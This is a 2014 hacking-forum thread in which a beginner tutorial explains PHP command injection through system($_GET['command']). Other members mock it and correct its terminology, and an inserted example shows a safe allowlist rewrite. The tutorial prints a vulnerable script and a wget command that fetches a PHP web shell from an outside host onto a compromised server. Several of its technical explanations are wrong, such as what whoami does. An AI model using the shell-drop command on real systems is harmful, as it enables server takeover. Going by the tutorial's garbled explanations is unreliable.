Tutorial [Concept] RCE [Remote Command Execution]
[Concept] RCE [Remote Command Execution] #1
This is DEDICATED to some guy that Diss Offended me.


What is Remote Code Execution (RCE):

RCE is a vulnerability that affects the PHP $_GET variable. As most of us know, if the scripter uses a $_GET variable in his code, it means that the URL will actually get formatted as the user asks for, as the information sent by the webserver will be visible to anyone in the URL. Example:

Code:
http://www.site.com/index.php?id=1

That's a simple example of what the $_GET PHP variable does.


How does Remote Code Execution affect a script:


Code:
<?php
$command=$_GET['command'];
system($command);
?>

That was a simple PHP script that has the RCE exploit flaw. It's pretty obvious to any PHP scripter how the script works, but I'll explain it.

Firstly we assign the variable $command to the $_GET variable and give it a parameter "command". Then the $command variable is used as a parameter to system(), so the user will be able to execute anything via the $_GET variable through system(), which is pretty vulnerable and easily exploited.

So if we get to use the script somehow, our URL will look like:


Code:
somepage.php?command=whatever

In our case it'll be pretty easy to exploit it, as the command parameter passes through the system() function, so anything that the user adds after "command=" will go through the system() function. So a simple knowledge of Linux commands will get you through to success.

Another simple example:

Code:
<?php
$command=$_GET['command'];
echo exec($command);
?>

This case is apparently the same as the one above. In this case it just uses the exec() function instead of the system() function to get the user's insertion into a shell command.

Exploitation

Let's try exploiting it by running simple Linux commands through the URL parameter "command=". For example:

Code:
whoami <--- Reads the Internet socket to show if you have the privileges of root or not. It will just tell you that you only have the privileges of Apache; if you are root, it will tell you that you're root
uid <--- Fetches your ID

Those were just some simple Linux commands that usually everyone uses.
By using any of them in the URL like this:


Code:
somepage.php?command=UNIX command

Results:

Code:
Linux www.***.org 2.6.9-34.ELsmp #1 SMP Fri Feb 24 16:54:53 EST 2006 i686

Now it'll show you the kernel version / hostname etc.

Now to managely exploit this you will have to use wget to get a shell spawned on the webserver.
To do this you'll need to use the famous wget(). wget() can be used to download various files onto a server you have gained control of, for example:


Code:
wget http://www.site.com/shell.txt -O shell.php

What this command does is that it gets your shell.txt (source code of your PHP shell) downloaded, then renamed by the "-O" option to shell.php to allow your PHP shell to be executable.

There are more than those 2 ways of finding RCE exploits in a PHP script. I might write some other tutorials about them.
This isn't much.
Excuse me if the tutorial wasn't good enough, but expect way better tutorials next time,

Best regards,
Z0le
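
Added example, not part of the original post or of any reply: the same kind of handler written so that request input never reaches a shell, which is the fix for the `system($_GET['command'])` pattern shown in post #1. The action names, the binary paths behind them and the `run_action()` helper are hypothetical; it assumes PHP 7.4 or later, where `proc_open()` accepts an argument array and starts the program without invoking a shell.

```php
<?php
// Added illustration (not the thread author's code).
// The request value only selects a key; it is never part of a command line.
// Action names and binary paths below are assumptions for this example.
const ALLOWED_ACTIONS = [
    'uptime' => ['/usr/bin/uptime'],
    'disk'   => ['/bin/df', '-h', '/'],
];

function run_action(string $action): array
{
    // Exact-match allowlist: anything that is not a known key is rejected,
    // including shell metacharacters, extra arguments and other binaries.
    if (!array_key_exists($action, ALLOWED_ACTIONS)) {
        return ['status' => 400, 'output' => 'unknown action'];
    }

    // Array form of proc_open() (PHP >= 7.4) executes the argv directly,
    // so there is no shell to interpret ';', '|', '$()' or backticks.
    $spec = [1 => ['pipe', 'w'], 2 => ['file', '/dev/null', 'w']];
    $proc = proc_open(ALLOWED_ACTIONS[$action], $spec, $pipes);
    if (!is_resource($proc)) {
        return ['status' => 500, 'output' => 'failed to start'];
    }

    $output = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    $exit = proc_close($proc);

    return ['status' => $exit === 0 ? 200 : 500, 'output' => $output];
}

// In a web handler the call would be run_action($_GET['action'] ?? '') and
// the output would be passed through htmlspecialchars() before being echoed.
// Constructed sample inputs: one valid action, then values of the kind the
// tutorial places after "command=".
$samples = [
    'uptime',
    'whoami',
    'uptime; whoami',
    'wget http://www.site.com/shell.txt -O shell.php',
];
foreach ($samples as $input) {
    $result = run_action($input);
    printf("%-50s -> HTTP %d\n", $input, $result['status']);
}
```

Run from the CLI, only the first sample is executed; the other three are rejected with 400 before any process is started.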


RE: [Concept] RCE [Remote Command Execution] #2
m8, i don't know what you're trying to prove
Unleash the lead from my pistol into my head bumpin' crystal


RE: [Concept] RCE [Remote Command Execution] #3
(05-13-2014, 11:30 PM)Kosaki Wrote: m8, i don't know what you're trying to prove

I'm trying to prove that copy & pasting doesn't always make you a skid like what other underdeveloped people are trying to prove.


RE: [Concept] RCE [Remote Command Execution] #4
Wow.

Who would have thought that supplying input to system() would give you command execution. Some fascinating stuff here.


RE: [Concept] RCE [Remote Command Execution] #5
(05-13-2014, 11:42 PM)Dyme Wrote: Wow.

Who would have thought that supplying input to system() would give you command execution. Some fascinating stuff here.

[Concept] <== Does its job in the header.


RE: [Concept] RCE [Remote Command Execution] #6
(05-13-2014, 11:42 PM)Dyme Wrote: Wow.

Who would have thought that supplying input to system() would give you command execution. Some fascinating stuff here.

lmfaoooooo
XMPP - wrath@xmpp.jp


RE: [Concept] RCE [Remote Command Execution] #7
This just in, if you let a user provide a command to run, the user can run a command.

That isn't even what RCE stands for. Remote Code Execution
micrictor@creep.im


RE: [Concept] RCE [Remote Command Execution] #8
(05-14-2014, 12:20 AM)w00t Wrote: This just in, if you let a user provide a command to run, the user can run a command.

That isn't even what RCE stands for. Remote Code Execution
RCE has two meanings: Remote Command Execution (executing commands on the server), which is what I just mentioned above, and Remote Code Execution (which is by using file protocols that may lead to reading an arbitrary file, etc.), which I posted a tutorial about then deleted. I'm capable of re-sending it to you if you want.


RE: [Concept] RCE [Remote Command Execution] #9
Wasn't this sort of obvious? I mean, if you're executing a command that's supplied through the URL you're instantly vulnerable.... I thought only potatoes did that....


RE: [Concept] RCE [Remote Command Execution] #10
(05-14-2014, 12:27 AM)Z0le Wrote: RCE has two meanings: Remote Command Execution (executing commands on the server), which is what I just mentioned above, and Remote Code Execution (which is by using file protocols that may lead to reading an arbitrary file, etc.), which I posted a tutorial about then deleted. I'm capable of re-sending it to you if you want.

Not wanting to piss on the time/effort you took to write this up...
but you may want to hold off re-sending anything before you can argue the difference between the two....
(I want you to re-read the quote above)

https://www.owasp.org/index.php/Command_Injection
https://www.owasp.org/index.php/Code_Injection

Also fix the terminology in your tutorial

(05-13-2014, 11:28 PM)Z0le Wrote: [Concept] RCE [Remote Command Execution]

(05-13-2014, 11:28 PM)Z0le Wrote: How does Remote Code Execution affect a script:
